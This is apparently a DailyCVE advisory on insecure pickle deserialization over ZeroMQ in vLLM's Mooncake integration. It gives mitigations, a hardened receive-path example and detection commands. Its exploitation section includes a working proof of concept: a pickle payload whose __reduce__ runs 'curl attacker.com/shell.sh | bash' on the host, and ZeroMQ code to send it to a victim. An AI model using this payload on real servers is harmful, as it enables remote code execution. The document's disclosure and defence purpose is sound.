How the CVE Works:
The vulnerability in vLLM’s Mooncake integration arises from insecure deserialization via ZeroMQ sockets. The `recv_pyobj()` method in `mooncake_pipe.py` implicitly uses `pickle.loads()` to deserialize data received over unauthenticated ZeroMQ channels. Since these sockets listen on all network interfaces, an attacker can send a malicious pickle payload, leading to arbitrary code execution on the server. This flaw mirrors GHSA-x3m8-f7g5-qhm7, where unsafe deserialization enables RCE. The lack of encryption or authentication exacerbates the risk, allowing remote exploitation without prior access.
DailyCVE Form:
Platform: vLLM
Version: Pre-32b14baf8a1f
Vulnerability: Insecure Deserialization
Severity: Critical
Date: 2025-04-29
What Undercode Say:
Exploitation:
1. Craft a malicious pickle payload:
```python
import os
import pickle

class Exploit:
    # pickle invokes __reduce__ on load, so the returned callable runs on the receiving host
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell.sh | bash",))

payload = pickle.dumps(Exploit())
```
2. Send payload via ZeroMQ:
```python
# payload is the pickled bytes from step 1; send_pyobj() would wrap them in a second pickle,
# so the raw frame is sent with send()
import zmq

ctx = zmq.Context()
s = ctx.socket(zmq.PUSH)
s.connect("tcp://victim:5555")
s.send(payload)
```
Mitigation:
1. Patch `mooncake_pipe.py` to disable pickle:
```python
import json

def recv_pyobj(self):
    # replace pickle with JSON: parse the frame as data, never as executable objects
    return json.loads(self.recv())
```
2. Restrict ZeroMQ to localhost:
```python
self.socket.bind("tcp://127.0.0.1:5555")
```
3. Validate sender IPs:
```python
if peer_ip not in ALLOWED_IPS:
    raise SecurityError("Unauthorized connection")
```
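A hardened receive path that combines the three mitigation steps above (JSON instead of pickle, loopback-only binding, and a fail-closed frame check), as an added example that is not vLLM's or Mooncake's own code; `SafePipe`, `safe_loads`, `check_bind_endpoint` and the in-memory `_FakeSocket` are assumed names for illustration, and the demo runs without pyzmq installed.

```python
import json
import pickle  # only used to build a benign sample frame for the demo, never to load one

ALLOWED_BIND_HOSTS = ("127.0.0.1", "::1")

def is_pickle_stream(data: bytes) -> bool:
    # Protocol >= 2 pickles (the Python 3 default) start with the PROTO opcode 0x80.
    return data[:1] == b"\x80"
def safe_loads(data: bytes, max_bytes: int = 1 << 20) -> dict:
    # Decode one frame strictly as a JSON object; pickle, oversize and malformed frames fail closed.
    if len(data) > max_bytes:
        raise ValueError("frame exceeds %d bytes" % max_bytes)
    if is_pickle_stream(data):
        raise ValueError("pickle frame rejected; only JSON is accepted")
    try:
        obj = json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("malformed JSON frame") from exc
    if not isinstance(obj, dict):
        raise ValueError("expected a JSON object")
    return obj
def check_bind_endpoint(endpoint: str) -> str:
    # Accept only loopback tcp:// endpoints so the pipe is never reachable from the network.
    scheme, _, rest = endpoint.partition("://")
    host, _, port = rest.rpartition(":")
    if scheme != "tcp" or host.strip("[]") not in ALLOWED_BIND_HOSTS or not port.isdigit():
        raise ValueError("refusing non-loopback endpoint: %s" % endpoint)
    return endpoint
class SafePipe:
    # Wraps any object exposing recv() -> bytes and send(bytes), such as a zmq socket.
    def __init__(self, sock): self._sock = sock
    def send_pyobj(self, obj) -> None: self._sock.send(json.dumps(obj).encode("utf-8"))
    def recv_pyobj(self) -> dict: return safe_loads(self._sock.recv())
class _FakeSocket:
    # Constructed in-memory stand-in for a zmq socket so the demo runs offline.
    def __init__(self): self.frames = []
    def send(self, b): self.frames.append(b)
    def recv(self): return self.frames.pop(0)

def demo() -> tuple:
    # Round-trip a JSON frame, then show that a pickle frame on the same pipe is refused.
    sock = _FakeSocket(); pipe = SafePipe(sock)
    pipe.send_pyobj({"op": "transfer", "length": 42})
    accepted = pipe.recv_pyobj()
    sock.send(pickle.dumps({"op": "transfer"}))  # benign content, but still a pickle
    try:
        pipe.recv_pyobj(); rejected = False
    except ValueError:
        rejected = True
    return accepted, rejected
```

Wiring this into a real pipe means calling `check_bind_endpoint()` before `socket.bind()` and routing every receive through `SafePipe.recv_pyobj()`, so no code path ever reaches `pickle.loads()` on network input.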
Detection:
- Monitor suspicious ZeroMQ connections:
```shell
netstat -tulnp | grep 5555
```
- Audit vLLM logs for references to pickle deserialization:
```shell
grep -r "pickle.loads" /var/log/vllm
```
Reported By: github.com